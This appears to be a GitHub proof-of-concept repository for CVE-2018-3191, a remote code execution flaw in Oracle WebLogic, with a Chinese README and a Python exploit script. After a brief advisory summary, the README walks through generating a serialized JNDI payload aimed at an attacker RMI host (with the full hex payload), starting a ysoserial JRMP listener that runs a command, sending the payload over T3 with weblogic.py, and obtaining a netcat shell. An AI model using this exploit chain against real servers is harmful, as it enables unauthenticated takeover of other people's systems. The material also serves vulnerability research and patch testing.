├── README.md ├── generate-payload.jpg ├── get-tcp-shell.jpg ├── jas502n-poc.txt ├── jas502n.txt ├── listener-port-rmi.jpg ├── push.sh ├── send-payload.jpg ├── send.jpg ├── weblogic-web.jpg ├── weblogic.jpg ├── weblogic.py └── ysoserial-0.0.6-SNAPSHOT-BETA-all.jar /README.md: -------------------------------------------------------------------------------- 1 | # Weblogic-CVE-2018-3191远程代码命令执行漏洞 2 | 3 | ### weblogic For Docker 环境 4 | 5 | 6 | ## 0x00 简介 7 | 8 | ![](./weblogic.jpg) 9 | 10 | 北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(Critical Patch Update)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。 11 | 12 | 该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。 13 | 14 | Oracle官方CPU链接: 15 | 16 | https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html 17 | 18 | 官方修复方案: 19 | 20 | Oracle官方已经在10月关键补丁更新CPU(Critical Patch Update)中修复了该漏洞,强烈建议受影响的用户尽快升级更新进行防护。 21 | 22 | https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW 23 | 24 | 25 | ## 0x01 Generate Payload 26 | 27 | ![](./weblogic-web.jpg) 28 | 29 | 30 | ### Usage: 31 | ` 32 | 33 | java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://www.canyouseeme.cc:6668/Jas502n >jas502n.txt 34 | 35 | 36 | https://github.com/voidfyoo/CVE-2018-3191/releases/download/10.3.6.0/weblogic-spring-jndi-10.3.6.0.jar 37 | 38 | wget https://github.com/voidfyoo/CVE-2018-3191/releases/download/12.2.1.3/weblogic-spring-jndi-12.2.1.3.jar 39 | 40 | java -jar weblogic-spring-jndi.jar 41 | 42 | Example: 43 | 44 | java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp 45 | 46 | weblogic-spring-jndi-12.2.1.3.jar for weblogic: 47 | 48 | 12.2.1.3 49 | 50 | weblogic-spring-jndi-10.3.6.0.jar for weblogic: 51 | 52 | 10.3.6.0 53 | 12.2.1.0 54 | 12.1.3.0 55 | 12.2.1.1 56 | 57 | ` 58 | 59 | ![](./generate-payload.jpg) 60 | 61 | ``` 62 | payload(hex): 63 | 64 | aced00057372004d636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765724ef3ecfbb628982f0200085a001a616c6c6f77437573746f6d49736f6c6174696f6e4c6576656c735a001c6175746f6465746563745472616e73616374696f6e4d616e616765725a00196175746f646574656374557365725472616e73616374696f6e5a00146361636865557365725472616e73616374696f6e5a001f757365725472616e73616374696f6e4f627461696e656446726f6d4a6e64694c00167472616e73616374696f6e4d616e616765724e616d657400124c6a6176612f6c616e672f537472696e673b4c00267472616e73616374696f6e53796e6368726f6e697a6174696f6e52656769737472794e616d6571007e00014c0013757365725472616e73616374696f6e4e616d6571007e00017872005e636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e737570706f72742e4162737472616374506c6174666f726d5472616e73616374696f6e4d616e6167657235f8d3063abc94c402000749000e64656661756c7454696d656f75745a001d6661696c4561726c794f6e476c6f62616c526f6c6c6261636b4f6e6c795a0024676c6f62616c526f6c6c6261636b4f6e50617274696369706174696f6e4661696c7572655a00186e65737465645472616e73616374696f6e416c6c6f7765645a0017726f6c6c6261636b4f6e436f6d6d69744661696c75726549001a7472616e73616374696f6e53796e6368726f6e697a6174696f6e5a001b76616c69646174654578697374696e675472616e73616374696f6e7870ffffffff00010100000000000000010101007070740025726d693a2f2f7777772e63616e796f757365656d652e63633a363636382f4a61733530326e 65 | ``` 66 | 67 | ## 0x02 Linsten java RMI 68 | 69 | ``` 70 | java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "command" 71 | 72 | root@374bb3d9a2d8:/tools# ./rmi.sh 73 | * Opening JRMP listener on 6668 74 | ``` 75 | ![](./listener-port-rmi.jpg) 76 | 77 | ## 0x03 Send Payload to T3 78 | 79 | python weblogic.py www.canyouseeme.cc 7001 jas502n.txt 80 | 81 | ![](./send-payload.jpg) 82 | 83 | 84 | ## 0x04 Get-Nc-Shell 85 | 86 | ![](./send.jpg) 87 | 88 | ![](./get-tcp-shell.jpg) 89 | 90 | ## 0x05 参考链接 91 | 92 | https://github.com/voidfyoo/CVE-2018-3191 93 | 94 | 95 | ## YouTube 演示视频 96 | 97 | [![CVE-2018-3191](https://i.ytimg.com/vi/KEgOrgcLu0s/hqdefault.jpg?sqp=-oaymwEZCNACELwBSFXyq4qpAwsIARUAAIhCGAFwAQ==&rs=AOn4CLCLGk3OZ83msmbe5IgfAq6EFN2Dhw)](https://youtu.be/6tC5aaUEVCw) 98 | 99 | 100 | -------------------------------------------------------------------------------- /generate-payload.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/generate-payload.jpg -------------------------------------------------------------------------------- /get-tcp-shell.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/get-tcp-shell.jpg -------------------------------------------------------------------------------- /jas502n-poc.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/jas502n-poc.txt -------------------------------------------------------------------------------- /jas502n.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/jas502n.txt -------------------------------------------------------------------------------- /listener-port-rmi.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/listener-port-rmi.jpg -------------------------------------------------------------------------------- /push.sh: -------------------------------------------------------------------------------- 1 | git add ./* 2 | git commit -m "update" 3 | git push -u origin 4 | -------------------------------------------------------------------------------- /send-payload.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/send-payload.jpg -------------------------------------------------------------------------------- /send.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/send.jpg -------------------------------------------------------------------------------- /weblogic-web.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/weblogic-web.jpg -------------------------------------------------------------------------------- /weblogic.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/weblogic.jpg -------------------------------------------------------------------------------- /weblogic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | import struct 6 | 7 | if len(sys.argv) < 3: 8 | print 'Usage: python %s ' % os.path.basename(sys.argv[0]) 9 | sys.exit() 10 | 11 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | sock.settimeout(5) 13 | 14 | server_address = (sys.argv[1], int(sys.argv[2])) 15 | print '[+] Connecting to %s port %s' % server_address 16 | sock.connect(server_address) 17 | 18 | # Send headers 19 | headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' 20 | print 'sending "%s"' % headers 21 | sock.sendall(headers) 22 | 23 | data = sock.recv(1024) 24 | print >>sys.stderr, 'received "%s"' % data 25 | 26 | payloadObj = open(sys.argv[3],'rb').read() 27 | 28 | payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' 29 | payload=payload+payloadObj 30 | payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' 31 | 32 | # adjust header for appropriate message length 33 | payload=struct.pack('>I',len(payload)) + payload[4:] 34 | 35 | print '[+] Sending payload...' 36 | sock.send(payload) 37 | data = sock.recv(1024) 38 | print >>sys.stderr, 'received "%s"' % data 39 | -------------------------------------------------------------------------------- /ysoserial-0.0.6-SNAPSHOT-BETA-all.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2018-3191/a440fe64bb9fda75d7f84d2eff2e9be261297746/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar --------------------------------------------------------------------------------